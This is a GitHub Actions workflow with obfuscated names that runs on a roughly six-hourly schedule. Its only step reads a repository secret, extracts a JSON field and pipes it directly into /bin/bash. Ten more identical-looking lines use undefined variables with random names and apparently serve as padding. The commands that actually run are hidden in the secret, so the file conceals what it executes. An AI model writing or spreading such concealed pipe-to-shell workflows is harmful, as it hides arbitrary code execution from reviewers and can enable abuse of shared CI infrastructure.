name: fawumubiao
on:
  workflow_dispatch:
  schedule:
    - cron: '7 5/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: fawumubiao
        env:
          t0025: ${{ secrets.t0025 }}
        run: |
          echo $t0025 | jq -r .zw6 | /bin/bash
          echo $qt352 | jq -r .na07195 | /bin/bash
          echo $gl3096 | jq -r .c34492 | /bin/bash
          echo $aia57459 | jq -r .uarwh97745 | /bin/bash
          echo $rks61 | jq -r .mhb65 | /bin/bash
          echo $vcyhp51 | jq -r .x2696 | /bin/bash
          echo $o221 | jq -r .zqpo171 | /bin/bash
          echo $oos9609 | jq -r .kyx96547 | /bin/bash
          echo $aemd22 | jq -r .hn6 | /bin/bash
          echo $b9456 | jq -r .yyz3319 | /bin/bash
          echo $exud5736 | jq -r .vb521 | /bin/bash

